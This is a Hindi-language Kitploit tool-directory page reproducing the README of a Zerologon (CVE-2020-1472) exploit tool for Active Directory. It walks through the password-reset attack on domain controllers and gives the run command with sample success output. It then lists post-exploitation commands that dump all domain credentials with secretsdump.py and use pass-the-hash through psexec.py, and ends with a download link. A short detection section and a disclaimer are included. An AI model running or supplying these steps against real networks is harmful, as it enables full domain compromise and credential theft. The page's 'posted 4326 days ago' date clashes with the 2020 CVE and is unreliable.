Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ZeroLogon-PoC-DC-Pwn — Zerologon (CVE-2020-1472) प्रूफ-ऑफ-कॉन्सेप्ट एप्लिकेशन - क्रिटिकल एक्टिव डायरेक्टरी भेद्यता शोषण उपकरण। | Kitploit
उपकरण/GitHubGitHub/mods20hh/zerologon-poc-dc-pwn
विशेषाधिकार वृद्धिपासवर्ड हमलेभेद्यता विश्लेषणशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षारेड टीमिंग
GitHubmods20hh/zerologon-poc-dc-pwn

ZeroLogon-PoC-DC-Pwn

Zerologon (CVE-2020-1472) प्रूफ-ऑफ-कॉन्सेप्ट एप्लिकेशन - क्रिटिकल एक्टिव डायरेक्टरी भेद्यता शोषण उपकरण।

4326 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

Zerologon (CVE-2020-1472)

अवलोकन

यह प्रोजेक्ट Zerologon भेद्यता (CVE-2020-1472) का एक कार्यान्वयन है, जो सबसे महत्वपूर्ण Active Directory सुरक्षा कमजोरियों में से एक है। यह भेद्यता एक अप्रमाणित हमलावर को डोमेन कंट्रोलर के मशीन खाते का पासवर्ड रीसेट करके पूरे Active Directory डोमेन से समझौता करने की अनुमति देती है।

CVSS स्कोर: 10.0 (गंभीर)

Zerologon क्या है?

Zerologon Microsoft के Netlogon रिमोट प्रोटोकॉल (MS-NRPC) में एक क्रिप्टोग्राफिक दोष है। यह भेद्यता उस तरीके में मौजूद है जिसमें Netlogon शून्य के हार्डकोडेड इनिशियलाइज़ेशन वेक्टर (IV) के साथ AES-CFB8 एन्क्रिप्शन का उपयोग करता है।

तकनीकी सारांश:

  • Netlogon प्रोटोकॉल एक चैलेंज-रेस्पॉन्स प्रमाणीकरण तंत्र का उपयोग करता है
  • अनुचित क्रिप्टोग्राफिक कार्यान्वयन के कारण, एक सभी-शून्य चैलेंज में मान्य प्रमाणीकरण उत्पन्न करने की 1/256 संभावना होती है
  • एक हमलावर इस दोष का विश्वसनीय रूप से शोषण करने के लिए ~2000 प्रमाणीकरण प्रयास भेज सकता है
  • एक बार प्रमाणित होने के बाद, हमलावर डोमेन कंट्रोलर के मशीन खाते का पासवर्ड एक ज्ञात मान (खाली हैश) पर रीसेट कर सकता है

यह कैसे काम करता है

root@kitploit:~
1. लक्ष्य चयन
   └─> डोमेन कंट्रोलर की पहचान करें (FQDN, NetBIOS नाम, मशीन खाता)

2. चैलेंज चरण (I_NetServerReqChallenge)
   └─> सभी-शून्य क्लाइंट चैलेंज भेजें (0x0000000000000000)
   └─> सर्वर चैलेंज प्राप्त करें

3. प्रमाणीकरण चरण (I_NetServerAuthenticate2)
   └─> शून्य क्रेडेंशियल्स के साथ प्रमाणीकरण का प्रयास करें
   └─> सफल होने तक दोहराएँ (~1/256 सफलता दर प्रति प्रयास)

4. पासवर्ड रीसेट चरण (I_NetServerPasswordSet2)
   └─> DC मशीन खाते का पासवर्ड खाली पर रीसेट करें
   └─> नया NT हैश: 31d6cfe0d16ae931b73c59d7e0c089c0 (खाली पासवर्ड)

5. शोषण के बाद
   └─> खाली क्रेडेंशियल्स के साथ पास-द-हैश का उपयोग करें
   └─> पूर्ण डोमेन समझौता प्राप्त हुआ

प्रोजेक्ट बनाना

पूर्वापेक्षाएँ

  • Windows विकास वातावरण (Windows 10/11)
  • Visual Studio 2022
  • Windows SDK

संकलन

Visual Studio का उपयोग करके:

root@kitploit:~
1. Open Visual Studio
2. Select **Build Solution** from the **Build** menu.

उपयोग

root@kitploit:~
Zerologon.exe <DC_FQDN> <DC_NetBIOS_Name> <Machine_Account_Name>

उदाहरण:

root@kitploit:~
Zerologon.exe DC01.corp.example.com DC01 DC01$

पैरामीटर:

  • DC_FQDN: लक्ष्य डोमेन कंट्रोलर का पूर्ण योग्य डोमेन नाम
  • DC_NetBIOS_Name: DC का NetBIOS नाम (आमतौर पर होस्टनाम)
  • Machine_Account_Name: मशीन खाता नाम ($ के साथ समाप्त होना चाहिए)

अपेक्षित आउटपुट:

सफल शोषण:

root@kitploit:~
[+] Targeting Domain Controller:
    FQDN           : DC01.corp.example.com
    NetBIOS Name   : DC01
    Machine Account: DC01$

[+] SUCCESS: Machine account password reset to empty!
[+] Now use Pass-the-Hash with:
      .\DC01$:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
[+] Then run: secretsdump.py -just-dc <domain>/<dc_account>@<dc_ip>

विफल शोषण (पैच किया गया सिस्टम):

root@kitploit:~
[-] Attack failed after 2000 attempts. Target likely patched.

शोषण के बाद

DC पासवर्ड को सफलतापूर्वक रीसेट करने के बाद, आप यह कर सकते हैं:

  1. डोमेन क्रेडेंशियल्स डंप करें:
root@kitploit:~
secretsdump.py -no-pass -just-dc 'DOMAIN/DC01$'@192.168.1.10
  1. पास-द-हैश प्रमाणीकरण:
root@kitploit:~
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC01$'@DC01

पहचान

नेटवर्क-आधारित पहचान:

  • एकल स्रोत से कई असफल Netlogon प्रमाणीकरण प्रयास
  • MS-NRPC ट्रैफ़िक में असामान्य पैटर्न
  • Zerologon शोषण के लिए IDS/IPS हस्ताक्षर

लॉग-आधारित पहचान:

root@kitploit:~
Event Viewer → Windows Logs → System
- Event ID 5827: Multiple password validation failures
- Event ID 5829: Secure channel reset

SIEM क्वेरीज़:

root@kitploit:~
source="WinEventLog:System" EventCode=5827 OR EventCode=5829
| stats count by Computer, SourceIP
| where count > 100

अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।

लेखक इस कोड के दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है।

संदर्भ

आधिकारिक संसाधन:

  • CVE-2020-1472 - NIST
  • Microsoft Security Advisory
  • Secura Research Paper

तकनीकी विश्लेषण:

  • Microsoft Netlogon Protocol Specification
  • Zerologon Technical Deep Dive

उपकरण:

  • Impacket Toolkit - शोषण के बाद के लिए
  • Mimikatz - क्रेडेंशियल निष्कर्षण

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है। अधिक जानकारी के लिए, LICENSE फ़ाइल देखें।

टूल डाउनलोड करें